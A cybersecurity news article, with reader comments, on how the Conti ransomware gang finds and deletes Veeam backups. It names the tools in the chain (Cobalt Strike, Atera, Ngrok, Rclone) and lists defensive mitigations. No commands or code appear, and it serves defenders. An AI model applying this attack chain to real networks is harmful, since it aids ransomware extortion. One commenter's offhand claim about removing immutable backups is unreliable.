Conti Ransomware Expands Ability to Blow Up Backups

The Conti ransomware gang has developed novel tactics to demolish backups, especially the Veeam recovery software.

Good at identifying and obliterating backups? Speak Russian? The notorious Conti ransomware group may find you a fine hiring prospect.

That’s according to a report published on Wednesday by cyber-risk prevention firm Advanced Intelligence, which details how Conti has honed its backup destruction to a fine art. After all, backups are a major obstacle to encouraging ransomware payment.

A Conti Primer

Palo Alto Networks has described the gang as a standout, and not in a good way: “It’s one of the most ruthless of the dozens of ransomware gangs that we follow,” the firm said.

As of June, Conti had spent more than a year attacking organizations where IT outages can threaten lives: Hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.

Infosec Insiders Newsletter

An example: In May, Ireland’s department of health services was still reeling a week after a Conti ransomware attack that wasn’t even all that successful. Officials said at the time that the attack would cost tens of millions of Euros to repair, even though the attackers didn’t even manage to encrypt systems.

Its expertise in demolishing backups has helped Conti – a top-tier Russian-speaking ransomware group that specializes in double extortion – to rain down destruction. According to AdvIntel’s Yelisey Boguslavskiy and Vitali Kremez, Conti bases its negotiation strategies on the premise that the majority of targets who pay the ransom are “motivated primarily by the need to restore their data.”

The two-slap whammy of double extortion entails both data encryption and the threat to publish that seized data. However, according to AdvIntel’s collection of Conti ransomware samples, publishing of data as only a secondary motivator for paying up – most particularly if those victims can rely on backups.

“If the victim has the ability to restore the files via backups, the chances of successful ransom payment to Conti will be minimized, even despite the fact that the risk of data-publishing persists,” the researchers wrote.

Conti’s Backup-Obliteration Methodology

AdvIntel has found that Conti builds its backup-removal expertise from the ground up, starting at the “team development level.” Namely, when the ransomware-as-a-service (RaaS) gang recruits workers to invade networks, it’s clear that penetration-tester candidates need top-notch skills at finding and obliterating backups.

“While selecting network intruders for their divisions also known as ‘teams,’ Conti is particularly clear that experience related to back-up identification, localization and deactivation is among their top priorities for a successful pen-tester,” according to AdvIntel’s analysis. “This backup focus implemented within the partnership-building process enables Conti to assemble teams, equipped with knowledge and skills aimed at backup removal.”

Veeam Vivisection

Conti has focused most particularly on developing new ways to compromise back-up software from disaster-recovery firm Veeam, researchers said.

Conti routinely initiates its attacks by installing the Cobalt Strike beacon: A legitimate, commercially available tool originally designed for network-penetration testers. It’s usage by crooks as a backdoor has gone mainstream in the world of crimeware, however.

Conti then leverages another legitimate tool: The remote-management agent Atera. Atera gives the gang persistence in an infected network.

Conti also uses Ngrok, a cross-platform application that exposes local server ports to the internet, to establish a tunnel to the local host for data exfiltration.

In many attacks seen by AdvIntel, this infection routine is followed by Conti operators finding and impersonating a privileged backup user — in order to grant themselves Veeam-backup privileges.

The attackers then typically use a weaponized Rclone – a command line program used to manage files on cloud storage – for data exfiltration of the Veeam backups. Finally, to ensure that the victim has been kneecapped and won’t be able to recover, the Conti attackers lock the victim’s system and manually remove those Veeam backups.

AdvIntel outlined the backup removal steps in the chart below:

Cobalt Strike backup removal sequence. Source: AdvIntel.

“With the Veeam account compromise, Conti has a method to deal with back-up software to ‘force’ ransom payment,” according to the firm’s writeup.

Veeam’s Response

093021 18:58 UPDATE: Rick Vanover, senior director of product strategy for Veeam, provided the following statement to Threatpost:

“There are more options than ever to keep Veeam backup data safe from ransomware. Immutable backup copies on-premises, in the cloud, storage system or unique service provider offerings, or even a combination of these. Veeam has capabilities to drive the highest confidence in data recovery.” —Veeam’s Rick Vanover.

Veeam provides numerous resources on setting up immutable backup and data replication, including this one.

How to Stop Conti’s Backup Destruction

AdvIntel offered these mitigations and recommendations to help fend off Conti backup removal attacks:

    1. To prevent the attack initiations, employee training and email security protocols should be implemented. Conti uses very developed social-engineering techniques in order to convince the victim employees that the targeted emails are legitimate.
    2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means for attack initiation. Tracking externally exposed endpoints is therefore critical.
    3. To prevent lateral movement, network-hierarchy protocols should be implemented with network segregation and decentralization.
    4. Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies, with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts — particularly those from C:\ProgramData and C:\Temp directory.
    5. Rclone and other data-exfiltration command-line interface activities can be captured through proper logging of process execution with command-line arguments.
    6. Special security protocols, password updates and account-security measures for Veeam should be implemented to prevent Veeam account takeover. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.

Rule #1 of Linux Security: No cybersecurity solution is viable if you don’t have the basics down. JOIN Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the 4 Golden Rules of Linux Security. Your top takeaway will be a Linux roadmap to getting the basics right! REGISTER NOW and join the LIVE event on Sept. 29 at Noon EST. Joining Threatpost is Uptycs’ Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.

Suggested articles

Discussion

  • Chris Blake on

    Disingenuous apocalyptic click-bait. Hacker gets admin control over any system and you've got problems. Poorly secured environments are always an easy target. This would be true for any backup (or other) vendor, regardless of platform (although the attack vector would be different).
  • anon on

    I disagree. This article outlines specifics in a useful way. Which groups are doing this (Conti), what the new focus is (attacking backups) as they realized backups are a primary thing preventing payouts, and even what hacking tools are used in what way, and what backup software is being targeted (Veaam). I found it very useful.
  • ivan on

    click bait and free shame of VEEAM. what is the novel tactic to delete veeam backups, rm? seriously? VEEAM deserve some apologies from you
  • SteveO on

    The Conti kids didn't invent mucking around with backups as part of an overall ransomware attack. All of the "big game hunters" are doing it. This tactic is not a "new focus", nor is it specific to VEEAM or any vendor. One of the reasons that attackers stay in systems/networks so long (200 days, more) is to learn about your backup infrastructure. By the time they're done, they know as much as your backup and recovery SMEs.
  • fabio on

    Fake article, EVERY sys admin , use VEEAM + NAS for backup , the nas WIll setup with NFS settings, AND , Veeam must be hardening as the backup repository , so all port close , and accesible ONLY from CONSOLE. , and second , usually we got 3 repositoy... 1 Hardening immutable , so noone cannot delete backup , 1 nas locally , 1 nas remote , 1 CLOUD , 1 HARDDISK offlino from internet !!!! ALL NAS need to have no connection to internet , same as VEEAM server.
    • Lisa Vaas on

      Not all Veeam users are taking advantage of immutability. This news is spurring some of those users to act, though, according to Veeam.
  • Robin on

    A lot of Veeam users dont use NAS for sure, probably only the small ones. Bigger organizations use a dedupe target such as Data Domain and using the DDBoost protocol. Then this particular scenario does not apply.
  • Rawad on

    Even if they are using NAS and there was compromise on the super user credentials then it can be encrypted. You need to look for a solution that doesnt give access directly to your data regardess from where the request is coming and this is called zero trust. There are few technologies offering access to clones keeping your data immutable and away from any attack
  • Anonymous on

    Veeam Immutable repository is a joke... I can use lsattr to remove every single backup set. lol Btw, Veeam Immutable cannot support Oracle Rman Stream backup.

Leave A Comment

 

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.